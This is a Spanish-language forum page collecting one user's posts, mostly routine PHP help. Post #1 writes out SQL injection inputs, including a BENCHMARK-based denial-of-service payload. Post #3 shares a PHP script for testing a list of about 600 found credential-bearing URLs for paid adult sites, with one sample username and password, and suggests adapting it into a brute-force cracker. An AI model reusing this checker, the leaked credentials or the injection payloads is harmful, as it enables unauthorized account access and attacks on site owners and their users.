Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - USUARIO_DE_SOFTWARE_LIBRE

#1
Hola. Siempre uso la función mysql_real_escape_string() de PHP para evitar inyecciones sql, entonces la uso en todas las variables $_GET y $_POST.
Me acabo de dar cuenta de que esta función permite inyección de código que no tiene comillas simples no dobles, por ejemplo:
http://ejemplo.com/index.php?id=%274
El "%274"  vale lo mismo que la comilla simple, entonces ya se puede inyectar sql en mi web!
También vi que se puede inyectar código poniendo una inyección sin comillas por ejemplo:
http://ejemplo.com/index.php?id=4 AND BENCHMARK(99999999,MD5(0x123123));
con "AND BENCHMARK(99999999,MD5(0x123123));" se genera un DoS en mi servidor, porque consume mucho procesador.
¿Existe una forma de que se limpien absolutamente todo tipo de inyección? Es decir, que no sea tan mala como mysql_real_escape_string que permite inyectar lo que mostré de ejemplo.
Muchas gracias de antemano :)
#2
PHP / Re: Probador de passwrods para webs
11 Abril 2009, 23:22 PM
Cita de: дٳŦ٭ en 11 Abril 2009, 22:25 PM
Te la pongo mas dificl, haz un php que aparte de validar el formato, haz que valide si la cuenta tiene acceso  :P suerte y gracias por compartir el script. Deberías hacerlo funcion y colgarla más arriba en el thread de funciones.
El script no valida el formato.
Lo que hace es intentar conectarse con las URLs que hay en un archivo de texto. Si pudo conectarse te lo dirá (claro que también debe ser correcta la contraseña y el usuario, en caso de requerir autentificación)..
#3
PHP / Probador de passwrods para webs
11 Abril 2009, 17:30 PM
Hola. Me cruzé con un listado de 600 URL's con acceso a webs XXX pagas :P
Ejemplo de las URL's que tengo:
http://qlysp1oon:B4k71D8gj2@dominio.com/members/
Esa webs está protegida con autentificación básica del protocolo HTTP.
El usuario es "qlysp1oon" y la pass es "B4k71D8gj2", lo que está después de la "@" es la URL a la que se accederá si colocamos la pass correcta.
El problema es que en este listado hay muchas contraseñas que son incorrectas, entonces con un simple script en PHP podemos probar cada URL para saber si funciona :D

<?php
$a
=fopen("NOMBRE DEL ARCHIVO QUE CONTIENE URL'S""r");
$c="";
while(!
feof($a)){
   
$c.=fread($a1024);
}
fclose($a);

$urls=explode("\r\n"$c);
foreach(
$urls as $url){
   if(@
fopen($url"r")){
      echo 
"Esta URL es correcta: $url\n";
   }
}
?>


Debes poner el archivo de texto con las URLS en le mismo directorio que el script y escribir el nombre del listado en la primer línea, en donde se indica.
Nos mostrará cada URL que es correcta.
Modificando un poquito el code podemos hacer un crackeador de fuerza bruta o también muchas otras cosas útiles ;)

Saludos!
#4
PHP / Re: Listado de Archivos
28 Agosto 2008, 15:11 PM
Yo tube ese problema una vez y usé la función is_dir que devuelve true si el nombre del archivo es un directorio.

if ($archivo != "." && $archivo != ".." && is_dir($archivo)==TRUE) {

de esa forma solo mostraría los directorios :)
#5
Cita de: Littlehack en 13 Mayo 2008, 22:04 PM
ya ya si es de la manera que lo estoy comprobando ahora, pero la cosa esta en que no quiero tener que descargar el archivo, con ese metodo si el archivo existe se descarga, yo no quiero descargarlo solo comprobar si existe.
Como te dijo el brujo.
Podés hacer así: conectarte con winsock al servidor web y enviarle un comando así:
GET /archivo.php http/1.1
HOST: www.elhacker.net



y como dijo el brujo, si te devuelve el estado 200 del protocolo HTTP, es porque el archivo se encontró sin ningún problema. Busca sobre el protocolo HTTP ;)

saludos
#6
PHP / Re: formulario para multiples registros
3 Febrero 2008, 13:29 PM
Cita de: pedraxito en  2 Febrero 2008, 07:42 AM
Cita de: Carxl en  2 Febrero 2008, 06:23 AM
Hola pedraxito, debes ingresar registro por registro, es decir, de uno en uno...

Saludos ;)

entonces, tengo q hacer una consulta para cada registro
Recorre el array y mete cada campo en la tabla:

for each($_POST["equipo"] as $campo){
mysql_query("INSERT INTO `tabla`
`equipo`='".$campo."'");
}

creo que es algo así lo que necesitás, no?
#7
Foro Libre / Re: Sus escritorios
5 Enero 2008, 17:46 PM
Este es mi Ubuntu que me instalé ayer :D

Me encanta :)
#8
Bueno... Como ya dijeron, el hacking tiene una ética, si se sigue esta a mi me parece que es totalmente legal. La web sigue esta ética.
El problema es que en los "Términos de uso" de mi hosting dice que el usuario no puede "Publicar o faciLitar material, o recursos sobre hacking; cracking (...)"
Por eso quiero conseguir otro hosting, si es posible en la que ustedes tengan su web sobre hacking hace mucho tiempo y no hayan tenido ningún problema...
Así que si alguien me recomienda alguno, se lo agradecería :-D
Saludos
#9
Hola, hice una web con varios amigos sobre hacking, pero el hosting no lo adminte (es hosting pago).
Por eso necesito saber de algún hosting pago que acepte contenido acerca de hacking.
Nada de warez ni cracks, ya que creo que casi ni debe existir algún hosting así xD
Saludos
#10
Tal vez sea porque la función session_start(); no la ponés al principio de todo, es un error muy común.
Fijate que no haya ni un espacio, ni un salto de línea, esa función tiene que estar al principio de todo
saludos